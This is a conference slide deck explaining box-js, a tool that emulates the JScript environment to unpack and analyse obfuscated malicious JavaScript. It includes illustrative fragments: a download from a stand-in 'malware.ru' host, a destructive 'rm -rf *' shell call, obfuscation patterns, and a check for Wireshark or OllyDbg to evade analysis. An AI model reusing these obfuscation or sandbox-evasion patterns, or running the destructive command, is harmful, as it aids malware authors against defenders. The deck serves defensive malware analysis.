@CapacitorSet
These slides were presented at ESC17 in Venice. They give an overview of how box-js works and what niche it fills.
Attention: many slides continue downward, not to the right.
Some slides include "speaker notes" (personal notes not shown to the public), which will appear in a grey box.
Original code: it's there, but we can't read it
Formatted code
Equivalent, but unreadable code
| Readable code | Obfuscated equivalent | Technique |
|---|---|---|
| download("http://malware.ru/") | download(base64decode("...")) | Use of encodings |
| beEvil(); | code = decrypt("..."); eval(code) | Use of cryptography (XOR) |
| shell.Execute("rm -rf *"); | things = ["rm -rf *", "Execute"]; shell[things[1]](things[0]); | Constants → variables in an array |
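The three techniques in the table can be tried out in a harmless form. The sketch below is only an illustration: the XOR key, the `xor` helper, and the fake `shell` object are assumptions made for the example, and nothing is downloaded or executed.

```javascript
// Toy illustration: each obfuscated form recovers the same value as the readable one.
const plainUrl = "http://malware.ru/";

// 1. Encoding: the URL is stored as base64 and decoded at runtime.
const encodedUrl = Buffer.from(plainUrl, "utf8").toString("base64");
const decodedUrl = Buffer.from(encodedUrl, "base64").toString("utf8");

// 2. Cryptography: single-byte XOR, where the same function encrypts and decrypts.
function xor(text, key) {
    return Array.from(text, (ch) => String.fromCharCode(ch.charCodeAt(0) ^ key)).join("");
}
const encrypted = xor("beEvil();", 0x2a); // 0x2a is an arbitrary key chosen for the example
const decrypted = xor(encrypted, 0x2a);

// 3. Constants moved into an array and looked up by index.
const calls = [];
const shell = { Execute: (cmd) => calls.push(cmd) }; // harmless stand-in, only records the command
const things = ["rm -rf *", "Execute"];
shell[things[1]](things[0]);

console.log(decodedUrl, decrypted, calls);
```

In every case the readable string never appears in the source, yet it is fully recovered once the code runs. This is why running the sample tends to be more productive than reading it.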
Malware has measures against automated analysis:
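// Simplified: real JScript would walk the collection with an Enumerator and compare each item's Name
processList = GetObject("WinMgmts:").InstancesOf("Win32_Process");
isVM = false;
for (i = 0; i < processList.length; i++) {
    if (processList[i] == "Wireshark.exe") isVM = true;
    if (processList[i] == "OllyDbg.exe") isVM = true;
    if (processList[i] == "...") isVM = true;
}
if (!isVM) {
    // ... the payload runs only when no analysis tool was found
}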
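One way an emulator could answer this kind of check is to hand the sample a process list that contains no analysis tools. The sketch below assumes the same simplified array-like API as the slide. The `GetObject` stand-in and the process names it returns are hypothetical, not taken from box-js.

```javascript
// Fake WMI entry point: reports a plausible desktop process list with no analysis tools in it.
function GetObject(moniker) {
    return {
        InstancesOf(className) {
            if (className !== "Win32_Process") return [];
            return ["explorer.exe", "svchost.exe", "winword.exe"];
        },
    };
}

// The check from the slide, run against the fake list.
const processList = GetObject("WinMgmts:").InstancesOf("Win32_Process");
let isVM = false;
for (let i = 0; i < processList.length; i++) {
    if (processList[i] === "Wireshark.exe") isVM = true;
    if (processList[i] === "OllyDbg.exe") isVM = true;
}

console.log(isVM); // false, so the sample would go on to its payload
```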
Emulating the JavaScript environment
Microsoft JScript is a JavaScript dialect
Any JavaScript engine can run JScript, with modifications
Which engine? Node.js, built on V8. V8 is developed by Google and is the same engine used in Chrome; Node.js runs it from the command line.
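A minimal sketch of what "with modifications" can mean in practice: the script is run inside a Node.js `vm` context that supplies the globals a JScript host would normally provide. The sample string and the fake `WScript` object are assumptions made for the example; box-js itself may wire things up differently.

```javascript
const vm = require("vm");

// Hypothetical sample: it relies on the WScript host object, which plain Node.js lacks.
const sample = 'WScript.Echo("Hello from " + WScript.ScriptName);';

const log = [];
const sandbox = {
    // Fake WScript host object: records output instead of showing a dialog.
    WScript: {
        ScriptName: "sample.js",
        Echo: (...args) => log.push(args.join(" ")),
    },
};

vm.createContext(sandbox);
vm.runInContext(sample, sandbox);

console.log(log);
```

The Node.js documentation states that `vm` is not a security mechanism, which fits the deck's later point that analysis still needs an isolated environment.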
We want to create "fake" libraries that emulate the real ones and capture information
Stub versions of the ActiveX components we are interested in
They seem to work correctly, but log interactions:
class XMLHTTP {
    download(url) {
        // Set the User-Agent sent with the request
        headers["User-Agent"] = "Internet Explorer 6.0";
        print(`New request to ${url}`);
        const output = request("GET", url);
        print(`Downloaded ${output.length} bytes.`);
        print("File type: " + identify(output));
        return output;
    }
}
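The "works correctly but logs interactions" idea can be generalised with a `Proxy`, so that every method call on a stub is recorded without writing the logging by hand. This is a sketch under assumptions: `makeLoggingStub` and the `ActiveXObject` stand-in are hypothetical helpers for illustration, not the box-js implementation.

```javascript
// Records every property read and method call made on a stub.
const interactions = [];

function makeLoggingStub(name, implementation) {
    return new Proxy(implementation, {
        get(target, prop) {
            const value = target[prop];
            if (typeof value !== "function") {
                interactions.push(`${name}.${String(prop)} read`);
                return value;
            }
            // Wrap methods so the call and its arguments are logged before running.
            return (...args) => {
                const shown = args.map((a) => JSON.stringify(a)).join(", ");
                interactions.push(`${name}.${String(prop)}(${shown})`);
                return value.apply(target, args);
            };
        },
    });
}

// Hypothetical stand-in for the ActiveXObject constructor seen by the sample.
function ActiveXObject(progId) {
    if (progId === "WScript.Shell") {
        return makeLoggingStub(progId, {
            // Pretend the command ran and returned exit code 0; nothing is executed.
            Run: (command) => 0,
        });
    }
    throw new Error(`No stub for ${progId}`);
}

const shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c calc.exe");

console.log(interactions);
```

From the sample's point of view the call succeeded, while the analyst gets a record of the command it tried to run.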
We dissect the code and add new nodes
eval(foobar.decrypt() + "unknown code")
eval(rewrite(foobar.decrypt() + "unknown code"))
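The runtime half of this rewrite can be sketched as follows. The static step that wraps each `eval` argument needs a JavaScript parser and is left out here. The `rewrite` body, the `capturedCode` array, and the toy `foobar` object are assumptions for illustration only.

```javascript
const capturedCode = [];

// Hypothetical hook: receives the string about to be evaluated, records it, returns it unchanged.
// A fuller version would also apply the same transformation to `code`, so nested evals are hooked too.
function rewrite(code) {
    capturedCode.push(code);
    return code;
}

// Stand-in for an obfuscated sample whose payload only exists at runtime.
const foobar = { decrypt: () => "var answer = 6 * 7;" };

// Rewritten form of: eval(foobar.decrypt() + " answer")
const result = eval(rewrite(foobar.decrypt() + " answer"));

console.log(result, capturedCode);
```

Because the hook sits between decryption and evaluation, the analyst sees the decrypted code even though it never appears in the file on disk.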
Note for the reader: in this phase I open a shell, run a command to analyze a sample, and go through the output of box-js. In particular, I try both the offline analysis and passing --download, where I show that the second stage is downloaded correctly, and finally I upload the second stage to VirusTotal and verify that it is malicious.
In practice:
We need an isolated, easily-reproducible environment
We use Docker containers: isolated from the host, started with a single command:
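# Options go before the image name; Docker requires image names to be lowercase
# --volume: shared folders, --env: environment variables, last argument: image name
docker run \
    --volume ~/sample.js:/samples/ \
    --env "QUEUE_IP=172.17.0.1" \
    capacitorset/box-js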
We need to put the samples to be analyzed in a queue, and process them with several workers
We create a work queue with RabbitMQ
Easily scalable approach: we can add and remove workers at will
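The worker pattern itself can be sketched without a broker. The example below replaces RabbitMQ with a plain in-memory array so that it stays self-contained. The sample names, the `analyze` placeholder, and the worker count are all assumptions for illustration.

```javascript
// In-memory stand-in for the RabbitMQ queue: workers pull until it is empty.
const queue = ["a.js", "b.js", "c.js", "d.js", "e.js"]; // hypothetical sample names
const results = [];

// Placeholder for a real analysis run; resolves after a short delay.
function analyze(sample) {
    return new Promise((resolve) => setTimeout(() => resolve(`${sample}: done`), 10));
}

async function worker(id) {
    let sample;
    while ((sample = queue.shift()) !== undefined) {
        results.push({ worker: id, report: await analyze(sample) });
    }
}

// Scaling up or down only means changing how many workers are started.
const workerCount = 3;
const finished = Promise.all(Array.from({ length: workerCount }, (_, i) => worker(i)));
finished.then(() => console.log(results));
```

With a real broker the workers would be separate containers and the queue would survive a worker crash, but the division of labour is the same: each worker takes the next sample as soon as it is free.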
Typical scenario: malware analysis researcher/company
The user quickly extracts the second stages, either as URLs or as files, and can analyze them with VirusTotal/Malwr/other sandboxes
In short: emulation simplifies and speeds up first-stage analysis, and results in more accurate analyses
My malware analysis project:
https://github.com/CapacitorSet/box-js